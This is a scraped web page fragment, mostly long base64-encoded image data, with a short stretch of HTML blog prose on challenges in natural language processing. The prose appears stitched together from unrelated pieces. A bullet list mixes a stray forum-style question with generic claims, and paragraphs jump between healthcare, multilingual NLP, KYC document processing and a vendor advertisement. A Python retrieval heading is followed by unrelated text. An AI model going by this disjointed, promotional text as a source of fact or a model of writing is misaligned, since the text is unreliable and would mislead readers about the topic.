GWMICxA4rEqgxElqqD6DH4nbbntJ7q1W5maC1F2YRGFkZTHHLjDEYbpyo3FsHHL3VgvHq\/jJs7RY5pbqeXEL8WHDzcVvY7ORuIy2BLKgGQOXquQCRy65pG57lkvtv7SsEttQ02G2v7OaG2Sd0McoMTk5U8MxAKcocsD27rV9K2r4p3Nlorbh2btx9UurqNNYuvg7Rlt7b4qWZ1iwcsoDQlAQxDq7NkkE0sC733i3tWzhu+n8VPc2hmja3SLzdaKPqPET6BgnfJOCAcE4IHPd+MO3tM3Bc6BrFtPbNHLKkEqESiYRLGZW4pllC9VPUd++M4Iqvx7S3tq8e8ptd2fpqyXcdr\/AAhHFq5lCM7yI7AY5cyQGYAcShwGDGoHWrPxR0+G21292Fo0l1PfK9yLfSobu6E4eZYLktGDydE+HBfAwDKAU5BkrYH0WDxf2ncwvJbNdORavdorQMnUCxSShVJ7cikUjDvjC9yD2rs1bxP2pomrHRdRvClyLmG0YAZ4zSmIIh98nrRHsD2bPor8fl97pW+9srrWq2vhnpsKxaXHp8Z06zgl+ITqxc44oY+TKjGS5YqVII4FlBBNd+vbf3Do2xxqS+HmhPr1tfRw2UFpocVwLdMeVoggJEaykuCQjBeQPAnqACznx42Sx01Yl1AtqlzBawJJavGxaaGWWPsR7rEc+nHI5YqYl8U9mwaHqG45dR46fpruk8pGD5QzNxX1JCox445EDsDkZpI254oNDp10u1tvc4+k0iGytetbuBKOaHmVZlJQDzD7KRx2fvWq38Pd4Wwv7AbZsPhdRnW\/viDbzxTXPUiA6UcwPTUJ1Mg+yKVIZiCBcm8XdtG4t0hgvJYJr02EtwIsJBJ0zJ5gcHHHic49GBrRYeNezrzR9N1mUXsCapAbiCPo9RmjDcQ2EycMwKrnBOPQCo5Nt7uTWf4nLtLR5I7XyIUtrXryxi5XEaOxGE6DO+CVJlz6LgNbdP2jta5sopLvYumWb8JE+Hls7dmjV0EbrlMrhkVVIBwVAB7DFAc0niToduVivba9trh7hLWOB41LvI8skS44sQAXicZJGMZOBXDc+MO1Y9v6tuC0W6uI9I0ibWXi4CNpoI4+oekXIDniVyQSFLAMQ3arBabL2fYXUd7ZbT0a3uIQojlisYldAoAXDBcjAVQPlgfKtkW0tqwI0UO2tKjR7aSzZVs4wGt3Ys8RAHdGYklfQkkkUBD7b8TNvbo1AaRp3xBvFha4kVoXVFjUR+cOwAKnqrg+p79uxxba47LRNF02aa507SLK1muHeWWSC3RGkdyC7MQMksVUkn1wM+ldtAK5dSm6FnI\/uRgfia6SR86h9enOI7ce+WP8v+9YHE8R2fCznztp8yWhDrKiRDnuO\/ofWubTy5tjFIMGKR4wP8oY8f8A04rp+v8AtXHHP0by6t+JkdikqKP8JXHr+KH9a5zue6ckgEbsD2Ck1Cbh3HDountdH77doVPq7fQfL6\/zrv1+8ttJgm1DU5FCKMhB3BJ9h8zn\/wDyvjuu61d69fte3Z7ekaZ7IvsBWl8TxSwbcI+0zZOE8PePkpS9hb+fkfOfEmO4uta\/jk7c2vv7Rv8AMOw\/LGB+VWrwntVi0Ce6x5p7lhn5qqqB+5auPdmnfxDRZ+AHUgHWQ479vX9s1YfD60NrtKw5LxMqtKR\/qYkftitXi80m3ubjjpKGGUFprYsVePfNZPrWK0XpJje0Veqi9I\/c8+jDLG4pSlawiYv\/AIc3HQ3NEn\/jRPH\/AO7\/ANtfXlJI718M21dNZa\/YXCHuJ1U\/gx4n9ia+5j0r61\/o5i+u4NUw79yb+jSf6nNek1LLioz8V9jNKUrrprh5kLLGzIvJgCQPma4bCe9ubKObULMW07Ll4g\/PifxHrXbKxSNnVSxUEgD3rj0+8nvLGK6uLKS0ldORhkILL+hNYs2u0JOT2enLlq3bdctS73dir3e4vEmwe8EWyYdVVLto7Xo3cdvygLjDsXc+iZ9slgcKB5jsv9f8QkkMOnbIhmzI6JcveoqhQ78XKHBIKqhxkHL+nYgQV54rbj0\/UJ7Q+GWv3USXrWUU1vZ3BEg64Tqj7HAjCMHLkgHDBeQXlXvTfFvX7zb7avL4U7lhmWe1gFsbWRWcyw83YKyB+KHyFigALLyKYfp5RaWQ6zvUjUkG2Ik+GmHwUguUb4qLqAE8eQ4ngSRlgMjvj0qLn3vv60e3+K8M5+NzcxwL0tQidlRivKRh7AAsQBk+XvhcsOVPEPd8V5o1rdeHd63x1lY3N81uJnFq8\/NXjBMSqxiYJyDMrcWZioxW638TdZu7bSRF4ca6l1qto1wYp4JUS1brrEqTSdMhCVLSdxyCqPKc9gPce99+m7ksLjw0lhmaIyWpOoRvHNgxZ5MgYRgc5D39el7FlBk9S3Bva0u1isNkpfW7FgZF1GNGUDOCQw98D8OYz6Go613\/AKvc6JpWpybN1GKe\/uYLaS2+FuS1uZI0dmcNCrKqhnBcqFymCQTgcEHiRvK5mDW\/hjqZt52BtJZBJEzKI26hlR4w0RDrxUEZdSGAOQCBIJuPxQn6q\/1GtrXhLxjeS8jkEiE5BKhhxAXsTknI9O\/bp0rdm7p9Yi0nWdmPZBrH4t50uVlRX5opiBAxyAZj3Izw7ZGSOm13Lqd5ocV\/FoEsV8Z0jnspRKpjVpumWDGMcsDz9hjA9cEExF94la9aSSxHw51iVoU6haKOVl7opCqel525NghcgBWOSRxoDsG4vEGaS5WPYMUJiPFHl1KMiU\/4lAH3PfuQ2B6DOBst9yb9bmbjYKqqziNeOpRlmj5EGTjjAGAG45J8wHzrk0\/f247md7KfYOowzqxwzdQQsuWwQ\/T79uPbGc88gAIZN+j7\/wBX1G9W0vdi6ppyB40knnDdMcuWMHhlvRR6DBJ5cRxZwOoa9vdrfTmGy4xNcmT4xTqCAWYBATvg9QsCT27Djj3qLXc3ierTGfw3hlBkPTVNUiTigRTgk55EtyGcADAz271H3fihuqDVdU0y38MNbuGs5pYrORIZAl2qSIoIkZBGvJXLAs4UhSOWQSLGm6dRWC\/a40aVZreJ57WGOKZ+vGiRszf2YIIMoUIAWJVsDIIAEfZ7g8Tml\/53ZNsYuT8uN2iniOoVIPJvUCJcYzliewyBpG8fETUNAtNW0fYqrdyTutxY3NwqskaTshw7FRlowGBAK9z3OBnFp4m6zNcx2a+Huss0nHMohlSKMtHzHMtGCpOR2wSvcNh8I3fNvXWRqkenW+ytUk61j8SsvErH1xE0jQFyvFSCYVDNgMXcDJjcADZc69vdFtrxNtQxwLNcrc25lEszRrGTCyspAXlIOJGHIBHp3xyT7n8RFjkvTsoW8VqGzbPNHLJd9o8cHRz0zyMgAKPy4rnp5ONOib63RrUiyRbEvbaz+JWAz3aS27kGTgzrE0fPjgFssFyOOcZPG46TrNrrMTzWkN5GqOyEXVpLbuSD3wkiqxHyOMH2JoCA1bX97R3aNoG1lvrQvHG4mcQMCHmWVsswPEYhZSEPJS2MkjGhNw+IbydKXYEXfqFZG1GNQAM8QQOWCRxHr3Oc8RV1pQFRg1rfVxq\/wLbUjsrJYLgfFyTpKDMrAQ4RXDcGXJyQDnsQPfl0\/cPig+nRfxLY9ml4GKSlL9eLccZdV74Vu\/EFye4zjBq8UoCn2m49\/SJA95sNITK7CRE1KNjCAuQWOADk+XAz6ZzitZ1jxIa\/ilG1bNbI2HVkg+JBl+KMjDpiTkAAIwpPkPdscvU1dKUBSptd38fgehsQKLhUkume\/jboN1E5R4BHLyNIQw7Ap6HODnUdb8Qv6vy3FntS2g1M3MMMMRmFyoiYrzlYBo88ckceQ7rnOKulKAomjbg8T7i7s7fVdjQWcDxwfFTfGRsEkZIzIVAckhX6y4IzjpnucrW673J4im2jay2BxkleVcTX8JMQDNwZlDYbkAuQrdi3yBNXWlAU46z4iWV7fJPti31O2N8iWT2rpbslszDLSCSVuRQciSOPIlQFHmYZbXPELm5GzIAsKlggvkbr+ZQqhjjgR52OQRhV7gsQtwpQFQXcPiA1m1x\/USITGJXSD+JJyDmQLwY4wCEJckZHbA71K7d1PXdQa+TXNJWwa3uEihCuXEqG3ikZgcDOJHkj\/wD08+9TVKAUpSgPJ+dVnU7gSXcrswCoeOSewAqcvr+O1ifipeUKSqD5\/X5Cqp0WmbqXLcjnIQfdX\/ufrWr9JK9owornqehgYXbmY6ks4xD5E\/8AEI7n8B\/ua5Lm6tdJm69weELQO8krt7oR6n3JDH9MVIu6xoXdgFUZJJ7AfWvj2\/8AeDa5dpZWL4sLeTBI7dVvTl+HyrQ+IY+GApZ3u9kbFw7h8+IVckdluyN3nuifcmpGRQ0dpHkQxk+3+I\/U\/wDz3qvVtlGRmtQ71zXE1Z16rqTerOlYahDDUlSpqyRhlDAqwBBGCD8qs1rZjTbSCxXssEaIoPyA7VX7aPrXUMWM85FUj6E1bdRdXnynooC5+eK8niWMWCw7kvaeiMTG3nOMOW5zetYpSueVO8m2RilKViIE3BKYJo5lOGjYMPx9q+\/Wsy3FtFOhysiBh+BFfn4qO+a+37Tuvi9uafMO\/wBgqn8V7H9xX0h\/RXFZcRisK+cYy+jt+UaJ0pp3hTqfFEq2e1R+k6pJqT3KtYz24tpmhzIMCTB+8vzBqQ+960CAHNd7nTqSqRlGVoq91bfw15WNPTSTTWpVN87m1XQXt4NKhtTJLb3N1yueRV+iEIgQKRmWTmePfsEc8Wxiqze+KWtW1tdwx7ZddRsxLGyOZGVpYmX0ULkROreWQt3IYEeU5se99H31qOp6XdbP16006GBZkvUmTk0ys0fErlWVSvFzkqcnA7Ak1WYdC8eBAobeGh9SMRed7cSJIVVyx49JDHlhEhPJshpGUJhFqctN194s39rCbpNk37xFrlvLJlxGkbtGXRUPFmMcgMZIZeI9Syqd20PFK\/3QmlTSbRayi1qRkhka+imPJImc5EXLH3Ozk9MqyNzyyoa9rPh\/40anbfwGfdeh3egtDDA9vcR5mmCFSzSyNCwcEqx4gIDzABAU8pPbOk+Nt7p4Xc2u6faxvpd3by26KhlF40koikEkSIBGqGLBAUngcrk5oDEHjLqeqac+p6dsXUrRIbdJWj1VXtm5s8BVRhGzmKcOO3dsp5SrYktc8Qtf0bS9P1RtttLK5uFu7KANJNIYbmOEiA9uRId5Rkd0T2GWEXd6N\/SBn3C0lhvHbsGjtPdfYmE9dIGR+gATEwLq5jJJ7Hi3ryrZLt3x8jvYvht7aJJZhHLrLAomLdEALzWHiB1ORB4njnJEn3AB6vPGK9s7+xsJ9kzg3MojDJfxuXbgX+xVQTMGQYUjALhlPAqMyl54izafq99pEuh\/EG2vJY2KS8WW1SGFzJxIJdy0z8UQZZYn45ZeJ47XbPifANMt5df0z4e205I7iZz1rn44zDqSxu8OCDBzT0Hd88RXm1214uptfVBebm087juby3ntZklJtlRFjDqR0QUQlXPAAnBAMn94AbbHxO1rUHiFvsmULzMTO10SokEqxEgiM8k5SKwcYygZsdsHm0Dxiuta3DpGgXez7vTn1WSdFmuJeKqsdsJgwBUZYk8Cmc5yRyCOU6tX0nxmk0q0ttD13RoLow3C3M1wwbjJykMJXFvhxhow3lT7pwO9cerbZ8YbvS9Yu7TVtqtuXqhdBvJrTK6fC2eoGYxlmLDipwACBnt90AZ0jxI3frmrwi323bQWHxdr1HaWR2+HmBGBhADIpwW9ApBXzHzVybl8a9W0fRZL3TtmyXl7HbNerAJmZDGERghdUJSQs\/Aji2HVl82Mma0PQ\/FGPdUV\/uDcFldaTFI06RQyBHAaKRShUQLyAdkIy49CSCcYrd3tv+khJaTy2m7dsR6mIZ1tH5OLZHeSNlMkQt\/OwCsvIsOzdlyCxAskniZqcWrXOmPtWTpWk8UUl18WvBld1HUjQjqTJwbsUBy6lMf3q7Nf35eaJKnDblxexR6el9N8JKkjtyLARwJ2M7eQjy+7wjGHJWBstD8Yruz3RJqmt2sMl9pdxa6MnXU\/B3WZOnK3TgBCkPEMBmI4HPIkcJ2DSPEoW06zbps+s1480D9FWCQdFwkTKIxyHV6bH+8V5DmCQKAqZ8eLj4W61FNnzz21ra3E4SCRpDO8csaGNH4ceZDOeBHc9McvP2kNW8YNS0lreJ9n30011HAU6fMgtIkHL+5jCPcxgjlyKrM3\/Swd2ytveMGn6hD\/AFz13Q7uzhukmSOwVoMKYrhZQQIgHy8sRGf8BPY1qGg+NtroRsLPcOitMkUaRS3ExcoUiYEMfhvOHkKsSQCFBGWPmIEJqnjpuuwt7me22E101tpcF6I4DI6XEzXy2zpHIE7gAlz5SVXuQcEVcP8AiczbZ1HXYdBuGfT746e8Zk4o8qkK7q4UkxZOFfj5uxwOQqJbb3jmvwKw700gQoUF2kkAZyqs\/IRuYR3K9MHkDk5IKgYbbZaR4vaVsuewe80qXXHvoWilsWjhiWFuHXJ5W\/FTzMz5EbMQw9T3oDuPiLuDTdB0vVNY2vNLcahaT300NqGBtUGDFEQw7yEOit90AhyB24nii8Y9Rc\/DSbMuIbuPkJw90Gt088ixnqxo\/lfgjBuIASQM3HBFc022\/G4PoiR7v0qQ2lur6g54wrLdGB1fjGLc5QSuHGXGVAXCsOpWW2t44rqNrHZ740u20eFLSNo0hV7hwrQicl5YmBLKs+PrImfunIHZH4tX50Cy1\/8AqdqsovbpF+ERCtxbwOImDOuDlwJR5QQPKcGuFfGfXYrgfFeHmqSWzWVvdI1hcJdSMXe5Mg4hQMJHbMx83LmVjC8mTlJ2ln4ux7ce21PWNLm1VrqIme3QMiw9BBKoDRoP7YOykg+UgE9s0s9O8SLfTIEF5I90iRibqSxurMkUatgkZyxWQ5IIBKnB8wM9Oj1izZkviYlbFOlLLkb+Bxjxe12cWctvsa9Ebzol4C\/JoEaPmOwXuUziUeqFHUcyBnfq3i1qOl7gu9GOzNSmt4JUt4rxGPB5HSdgzeTCxD4duT5PEMhweXbYkPiOZRc3ncwy3HTWKZTiNkTpgjAV2VgxyQB3x2HpZNpWmuQpe3e4HYXGoXCXIhE3VW3\/AOWhRol7AAB0c9sg55erEClWj1STzJ\/ArQxPXtrK18Sjab4z6\/q0Dz2eyJkV7V7iBJrnEi8OYZXDAcnJCsI1OTHlwckLVnXf73e0dV12xsg2o6ZaT3Z04TCSRlRpQmCow\/LpNjhlSQVDHHKritvGucZGexottErM6jzNgFvcgegJ96hMo+f7W8TNX1\/btlqlztVra7uWtVa1jujL0hLCJGLPwGGTDqUI5ZUcgvLtw2\/jJqM2paTpo2RedXVTH5Y7tJTbo4mYSOqglUC27Ic4IlZEx5uQ+oGJSMZNeBawK7SLGod1CM4ADFRnAz64GTj8TQHzOw8YNUu5o4W2TdpJNJAsaC\/hYMkiu3Iv9xHHT4iNyHL5GAoDM\/4vaz0TJJs5oZDcW1vFbyXbLI4mD4c\/Y4AXC5wT\/fx9zDfTjAhzyycgj19jWeklAfMbHxa1m81W\/wBJ\/qjK0ttPaQQvFcExSmeCCUMHMfmjQzMrSAdiqjieRx9H0u8\/iOmWmodJ4viYUm4OMMnJQeJHsRnFb+kuc5b0x61pmuUtyIY0MkhBIQev5n2FAb2kRAWdgoAySewFcvWuLo4tsxx\/+Ky9z\/pB\/mayls07dW8PIg5VB91f+5+v6YrpJxQERqqpaWot4x5pWyxJyW+pPv7VD9h2+dd2szmW94A\/2Y4j6mvnHiDvL+HRtoumv\/zUgxM4PeJT8v8AMf2rm3SLiFOnXnVqPSOiNi4Xg6mIy0aa1epGeIm8+uz7f0uX7IeW5lU9mP8AgB\/n+nzr53N2jJ+Xm\/TvWw9zn96wQCMGuUY3GVMbVdWfyXgjqGBwVPA0lSh834sw\/dTWgVtj80Q+gx\/t\/tWrGTjGfavOq6amfF6HbpETSXqOPSM8s\/X2qxMMrUfpduIFCnGT3NSOB6GufcVxvbK7t7K0X6nnV5Zp3NB7dqxXpxhjXmvLauiwUpSsRAmK+seG1x1ttrFn+wmdfwz5v\/dXyevofhTcEpf2hPYMkgH45B\/kK7P\/AEpxfZukUIP34yj6X\/BqnSOlnwTfg0\/x+T6EKzWBWa+qkc9FKUoBSlKAUpSgFKUoBSlKAUpSgFKUoBSlKAUpSgFKUoDHvTFZpQHkqayOwrNKAUpSgFKUoBXl5EjBZ2AA7kk+laZ7tY2EUYMkreiL6\/ifkPqa8LbPMeresHIPlQfdX\/ufr\/KgPPVmvTi3zHH6mRh3b\/SD\/M\/pXRBbxwJxRe57sSckn5kn1rYFA9BWaAVrkfpozn+6M17yKq+\/t12u1tEeecq88x6cEWe7n\/sPc\/71iY7FQwWHniKjsoq5Lh6E8TVjSpq7bKlvveKaDbvHbsG1C5yY17HgP8Z\/2+f5V8ammluJXnmkZ5HYszE5JJ963ahqF3ql3LfXspkmmOWJ\/kPkK5q+c+KcSqcRrOb9nkjsnCuGQ4dSy+893\/OQpSleYeoeYsLyUegYn9e9b7G26k5kYeVDn8TWlFLTFVBJbH\/apaOIRRiMfn+Na\/0gxvZqHVxfel9i2c7K3idloB5vpjFb61WoxHn5mttaGtjAlueJQMcvlWqt7AFSCK0VUIUpSsOWj0KkxVu8Mrow7gkgLeWa3bt9QQR\/vVV6J\/xftU9shWh3PYsrfeZlPb2Kmuj9D6s8Hx7CVf8AdL66fk8HikVVwdSPkz7GDWawvpWa+yjmApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSvEzcI2f8AwgmgMu6xqXcgAdyScAVy9We87QAxRe8hHmP+kH+Z\/T3rxaqbxYru5PPkA6J6KmfTt7n6n8sV3YA9BQGqC1itxiMEZ7kk5LH5k+5rdSlAKwfSs1ggMCD70BGa7rtjt3TJdTv3xHGPKoPmdvZR8yTX5x3duW+3Rqz6jeucekUWe0SewH\/zv+mLL4i61qGv7huLKebhbWErQwxjuAR2LH5k1R5Lcs5Jk9\/lXF+mvHqmPqPCUtKcX9X5\/g6b0Y4PTwdNYmprOSv8F\/NzmpW\/4b\/P+1Phv8\/7Vz7Kzb8yNFK3m2\/z\/tQW2e3P1+lUacVdjMjZY2+ZBcsMYBUfn\/8AP3ruYelFQRqqr6AgVlvauZcRxM8dXlVe3L4GPJ3Z1wDEQFe6xH9xfwrOPqaw1BmNe5ketaZB5vxrbj6mvEoHHNMjCNVK88\/pWeRrFnF5i4\/\/2Q==\" width=\"308px\" alt=\"challenges in nlp\"\/><\/p>\n<p><p>Finding an expert who can work in a technical system, but who is not afraid to read and analyze text for both meaning and structure, may seem daunting. I recommend linguists with NLP, corpus analysis or computational linguistics exposure, as well as data scientists with a text analysis focus. In other words, analysts who have analyzed text directly \u2013 not just applied prebuilt systems to text. Additionally, some technical writers or other linguistically oriented subject matter experts with experience in statistics or analytics are likely to be successful in building good models.<\/p>\n<\/p>\n<ul>\n<li>A human being must be immersed in a language constantly for a period of years to become fluent in it; even the best AI must also spend a significant amount of time reading, listening to, and utilizing a language.<\/li>\n<li>Thus far, we have seen three problems linked to the bag of words approach and introduced three techniques for improving the quality of features.<\/li>\n<li>Its just an example to make you understand .What are current NLP challenge in\u00a0Coreference resolution.<\/li>\n<li>Few of the examples of discriminative methods are Logistic regression and conditional random fields (CRFs), generative methods are Naive Bayes classifiers and hidden Markov models (HMMs).<\/li>\n<li>These applications merely scratch the surface of what Multilingual NLP can achieve.<\/li>\n<\/ul>\n<p><p>We will see how they can be effective in analyzing large amounts of data from various sources, including medical records, genetic information, and social media posts, to identify individualized treatment plans. We will also throw light upon some major apprehensions that Healthcare experts have shown with these technologies, and the workaround that can be employed to tackle them. Multilingual NLP is not merely about technology; it\u2019s about bringing people closer together, enhancing <a href=\"https:\/\/www.metadialog.com\/blog\/problems-in-nlp\/\">cultural exchange,<\/a> and enabling every individual to participate in the digital age, regardless of their native language. It is a testament to our capacity to innovate, adapt, and make the world more inclusive and interconnected. It promises seamless interactions with voice assistants, more intelligent chatbots, and personalized content recommendations. It offers the prospect of bridging cultural divides and fostering cross-lingual understanding in a globalized society.<\/p>\n<\/p>\n<p><h2>Document Retrieval Made Simple &#038; Practical How To Guide In Python<\/h2>\n<\/p>\n<p><p>As an example, the know-your-client (KYC) procedure or invoice processing needs someone in a company to go through hundreds of documents to handpick specific information. Both sentences have the context of gains and losses in proximity to some form of income, but the resultant information needed to be understood is entirely different between these sentences due to differing semantics. It is a combination, encompassing both linguistic and semantic methodologies that would allow the machine to truly understand the meanings within a selected text. Shaip focuses on handling training data for Artificial Intelligence and Machine Learning Platforms with Human-in-the-Loop to create, license, or transform data into high-quality training data for AI models.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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p51peRKYQRynSlvkTvvS8iVcJEpaRPamkjiUpb5E9qXkjq4OlLSJ7UygjlOlEXQelLyJvTzp13oDoKaWOJTiLJ7UF09qddKC0dMKI4lOJOntQ2SnGShmOjKIytOJmP2qBj9qcZB6UMoKKBGFpxQx1Ax+1NlBUSlStCCnFOSqpjkFVXrTPdzEgtTVa9AogA9K6oUnzPxTwD2oirVKKmBUCskGnqrRVXaoqKKooLJJAySCmEFCUUdFpV0kw0NGKYjHvQEFMxik6iSYaMRimoxS8YpqMdaQqJCBozGK8t8pYPd\/JLODMCRtsdtx3G\/apxik7XTsEWS+fEzEBi6x7diff0qsrowI4RMlm0tL\/F3puOkZJ4rWFriZuVE\/eO2\/tVrzeqJ8PeraxWqSAxh92YjuT\/opCsoG8magUXMyyOmYxWvV4hXq9sdD\/aNZfp7Nx5bHR3cvJFI2\/MvN0HUjp+lV9RLySVlc2EvkdHT1peF0fqjq23od6ZQUjUpxlYVAK2Do\/gxrLVsKXq2yY+yfqs93upYeqoBzEe\/Qe9Xvg\/oPFri7niRq+1llxmODPbW4gaUzMndwigl9j0CgHdvwreWP1bJPkMbi8lp3JY2XKWZuYWlRXjR135oHZCQkgXlbY9CCQCSpFa\/jcUUJSkL23P505ytxmZGi3d0dxuZyJxq4QTaA1pou9yudRsXk5Xspr4wFY7WTcbc27diH333HRW9KzvUHA7WGFs\/tDHiDL2gQPzWhPiBfXkPU\/8AV3rfvEDQOnOJemLrSmp7Uy2lxsyuhAkgkH7siMQdmH8wSDuCRWkcfpz4ruEduNP6RnwWtsHb\/TZtfnknhj8lIMiN09OZxt227UJMScTTUcYDLpY6Ai99D1idDNK6HiuL8785qu9nhx1vNdXr+FHbqWkLDblA7\/nWGcMLaVcdPdsvKlzM8qj0B2A\/xTWy+IfB\/jrxDsslrTW9jh8QlrEZ5cbi425p+Xcl2HMeYgdf3iTt61pPT3EWfFX4sr23CY4bRBAn7SIDoD0HX3G3l+tnRo99RZaJDHS9vDkOsvqGY0a9RKjaAaeptf0m12WrZlMza4yWK2aK4uLiYF0ht4i7lR3Y+QHXuauUM0F1AlzbyrJFIAysp3BFWjJY\/JxZVMzilgmcwfLSwTOU5l5uYFWAOxBJ6bdaWp01LWabGwYJdPvp5Q9hkLXKW3zVozcvMUZXUqyMO6sD1BHpU3X2pfDY25sYriW9kje5vJzPL4e\/IpIACrv5AKOvnTjrWWQBiF2lhhlYoC41irp60u6046+dAdKIolhTpxJ170vIlOutAkWmkEdp04jItLSJT0iUu6U0gjiU4i6UB0p10oLR0ygjiU4iyUJ0pxkoTJTKiNpTiTJUGjpxk9qEyUdRGVSKGOoFKaZagy9PSiCHVIqY\/aoMlMlKgy1KEFOL8g9aqjcvuaqsWMz3cwwLU1FUoqYFdZKz5VvKVamoqgKmoqBWZBnqrvRVFRUbUVRvQWWTBkkG1HQVBRtRkG1LuskDCItMRihKKPGKTqLCAxiMUzHQIxTEY8qRqJCAxqPtTUYpWMU1HSFRJMGBzX\/ii4Psv+MKx3WChs1GrEgGFRuBv5nyrJ8pBLc42aCBOZ2A2HbfqKxvV6uMzFII5CoiXqnQ9z2PlVPiltc+UjU2loFjAf8AjE3\/AMOf9NemwtwpPzE3Qb\/3uf8ATRRdqBuYchsPP5n\/APWpG7BUgQZLqNv75O3+LVebwVlmR8L3YXV6gP0sI9x67c9bKiUsQo7k7VrbhlHJHeXfOjLuE23G3k9bOtdhPGT25x\/hpeqtyTLPCD\/kJ2bj9K20GibfSUV1dWka2K23j2kpimRuXq6sOzc25\/Go47T2dS\/xt\/m9VT3v2dZ+D4MMXy8VxcHmDzyqpPN9JUBP3VPM2xJXlvkkrRWjTxQtMyRl1jTbdyBuFG\/Tc9qw+x17qO7x+lbybhtmbeTUFw0N7A5XmxKjm2km9jygjoO\/rsDz1TUcEj6ePWamSzEmZrVVYtNahyecvM1bZDS99iExd+1pby3JHLfRhQRNHt907\/6ncC+0FlKGxkCLSiARsRuDXDPxG8D\/ALK1fdXWnrdYjdf3TDHuAsyMeoB7BlO469wB+fauo9Q4nSeDvdR526+XsMfEZp5OUsQo8gB1JJIAA6kkCtNcR8\/ba\/srfG3ekM7gM2kMl\/ilycCL8\/bqN5kQxu20gXZzG2zgL271ZZXVq4er3ibbH8\/npLPKnQVu7rfsbQ+B5H0\/gzmvh5hs1hcbJaZUMoLlljJ35O3QH9T09aysrRSNqwviJqvKaY+Q+zRAfmfE5\/EQt+7y7bdfc1eCm2IqeJnRVNPLsPxNfhX36TKmWhstanfifq0coeK1HMN13gI3\/DrXh4l6tLmEw23OO6+Ad\/03o\/8Ar6vhBp2gwY3De39zaTigutYXo\/W2XzeXNlkVgMfhFh4acpDcyj19zWbsvShPRNJuFt5sWXYulj6Xe0tttYq60vIKlkXuEWOO2eFHlkCc0h7DYk7D7x2Hb8\/Kl4XuPmbi3nkhcIQyFD9QU79GXy227+dFVdLy0Rhx8Fvy15F19qA6024oDqaYQSyppE3Xagsm\/em3WgutNII2iRRloLLtTTr7UFlphRG0WLOtDZTTLJQ2WjrGVSLMvlQylMlaiUogEMFixSoFPamSlQKVK0IFi\/JVUbkHrVVm0zwzBADUwK9AG3apgV1oifI95QqYFeAdamANqgRM3klFEUVEURaEwkgYROtGQUJB06UZBS7CTBhko8Y2oKCmIxSjrCAw0de3s1xBbGS1i8SQEdNt\/wCXnXsYpmMUhXpllIBtJiTsXlkt45J05JGUFl9DVwjpaMb01EDSLpYWMMsZjHSoT3MSP4c1lLIB1B+nY\/huRRYxTMQ7VX1kvGALzHtRZaG0xUggxbBpv2XM\/Lsu4O56E9ae09mYL7HRzT4mQydQxQLynr3HMwNPZtoEw158wyBTA4HORsW2Ow6+e9O4aO1FmklmUMb9mQ7ggEgbVWVKZ4pNEPHvJ2V5bGdVXHywk\/fbkAH6MTV5j6bH0oEdMxilXp2jtNbTtOx1Hi7fSFnqbK38FnZNYw3Es88gREDKvcn3IH4mmcDqPBaosjkNP5W3vrdXMbtC+5Rx3Vh3Vuo6EA9RWBafwV9q7hHpkY67hgv8bJbX1obhS8DyW8p5UkUEEqQCOnUHlYdtqyXR2m81jMlnNQ6imsPn85NC7QWCt4MKRR8ijmYBpHPUlyB05Rtstc2rUqaFxfUEj5\/ms0ysgR2XoTMpqqqqpWBmP6+0muuNI5HTHzzWUl2qNBcqnP4M0ciyRPyn94B0UkeYBFY3i9I8RM1qnDZ7iLlMB8vp0yzWdtiI5R8xcvG0RmlaX90BHcCNd+rbljsK2JVUVK7ovAPH56H3EkGIFpz5xa4TXmIu59R6ctGmx0zGSaCNd2tmPcgDunn07fhXLnGb\/wA0\/wDvv+xX0YzWdwunLFspn8taY2zVlRp7qZYowzHZQWYgbkmtZcbuC\/DvWGlcnqDIYKNL\/FWF3d289sxi3fw+bdghAfqg771cZdmfcsvfAkbXmwpnz1MGcJXFzpZvIjf7zg3JazN\/JjJVxcMbY9udjzb+IenQdPpHTt1oh1wh1B9s\/Y8Yj8AQeCJPqIB33Lbd9\/bttW6vh4+GSy1xiW1Lry0uBa3ij5G3WRoj4fnM22x69lG\/UbnsRW4bj4LeEkyFYo8hbk\/ejunJH9omrevmeAoOaJBNtNNv5kP91XV\/363B2G4FhynHWhbg3urprsxrGZ1eTkUdF3dTsK2m4rKdWfDFccLpv6Q4edshj1+l5lVg8QJBAddz06D6h0\/CsZcVPvqeLPeUtp0fsuFOC4gwa5JuPrsQYjd2sF1H4VxGHUEMAfIjsR6GgJaQW7SNDGFaVi7nuWPuaLHfCe9ubEW06G2CEyMmyPzDf6T57edTkFFVSNJtVBadQ8ajXa\/lp94q4oDimXFAcUZRLOmsWcUBlppxQHFMqI4ixdl33oTL7UwwoTCjqI0ixdlobL6Uww8qEwo4EYVYAr51EijEVAjeiAQ6rAlagRRmHtUCpqQEIFgeX8aqp8tVWbTNpgYFTWvAKmAK64RPjuegedSUe1eAUQAVAiSBnqipr6V4tEAoTCSk16UZNvShKKMlLsJIGFTvTEftQEFMR+tLOIVYeOmY+\/SgRjqDTMYpKoIdYxH+FNxDpSRlKITGniFduZVPXagfMWzsXGTnjQndoeQ82\/oOnMPyqtruqaQ66S\/RimowKu+gNBao4gTquIx629u8wgS7vJBFEzEb8oJ\/ebYE8q7tsN9q3zhPhNso1D6h1bNIxHWOzgCAH\/nOTv8A2RWv5hnOBwR4a1TXoLk\/Lb1mWxNKj+4zmTUGDGfx4tRMYnRxIjbbjfYjYj86Y0tiJ8NYCzkkLgEnr6k9dvQV1Dk\/hVwLRf7Saov7eQf+lRJMp\/s8m3861frLg1rXRIa5ubL56wU\/33aAuqj1dduZPxI296raGbYDG1P+T\/F0On8wtDE4aq91Pxe0w5B2phKBHV+0nprI6tzlrgsbGTJcOOd9iViT7zt6AD\/R50zW4aal2NgJa3CKWbYTqbhFC8HDfBI4IJt2f8mdmH8iKy+l8dYW+Lx9tjLROWC0hSCMeiqAB\/IUxXKa9QVarVBzJPuZotZ+8qM45kmVUZZYoInmmkWOONSzux2CgdSST2FSoV5bi7tJ7QyNGJo2j51VWK7jbcBgVP4EEeoNCG+sHLDYcQdMZF8SILqZI874wx001u8cdwY225VZgBuwBZAf31BZdxWR1itrhtby\/YVtls1jDDj3kkyEtvaDxLxkO0AVXBWEFfqcr15hspA61lVEqBQfh\/NfIfntMm3KYrxNs8jfaTmt8XojG6snM8JGMyEqRwuA43clwV3UdR\/qDkzwxT27W9xAjxyIUeNgGUqRsVIPQjyqza00djNd4GTTuXub+C2kljlL2Vy0EoZGDDZl8tx\/qdjV9UBVCjfYDbqd68WHdgDcE\/Tx+nvP